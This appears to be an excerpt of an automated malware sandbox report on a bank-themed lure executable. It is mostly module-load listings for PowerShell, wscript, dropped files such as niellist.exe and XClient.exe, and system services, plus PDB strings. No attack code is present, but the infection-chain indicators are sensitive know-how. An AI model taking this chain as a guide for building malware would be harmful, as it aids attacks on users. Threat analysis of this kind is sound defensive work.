Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: version.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: tapi32.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: credui.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxstiff.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxsresm.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ualapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtctm.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtcprx.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtclog.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxclu.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: xolehlp.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: resutils.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: resutils.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: comres.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtcvsp1res.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxoci.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: oci.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: hid.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: ntmarta.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Static file information: File size 2007552 > 1048576

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000002.00000003.1692304917.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1253422637.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000002.00000003.1762060160.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1752773778.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1751658354.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: elevation_service.exe, 0000000C.00000003.2427700205.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000002.00000003.1391363557.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000002.00000003.1539403931.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000002.00000003.1539403931.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000002.00000003.1552275013.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2427700205.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: alg.exe, 00000002.00000003.1823198394.0000000001530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1817693971.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: elevation_service.exe, 0000000C.00000003.2399836267.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdbL source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdb source: elevation_service.exe, 0000000C.00000003.2444651718.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: RegSvcs.exe, 00000013.00000002.1452607862.0000000003085000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: crashreporter.pdb source: alg.exe, 00000002.00000003.2007802565.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: niellist.exe, 00000003.00000003.1285740418.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000003.00000003.1287306724.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398255172.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398796370.0000000004F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000002.00000003.1440737342.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000002.00000003.1686861132.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2490180834.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000002.00000003.1795445513.0000000001500000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: elevation_service.exe, 0000000C.00000003.2490180834.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000002.00000003.1707389126.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1699306292.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000002.00000003.1588294725.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000002.00000003.1399996879.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdb source: elevation_service.exe, 0000000C.00000003.2475542795.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2466935099.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2370075769.0000000000830000.00000004.00001000.00020000.00000000.sdmp
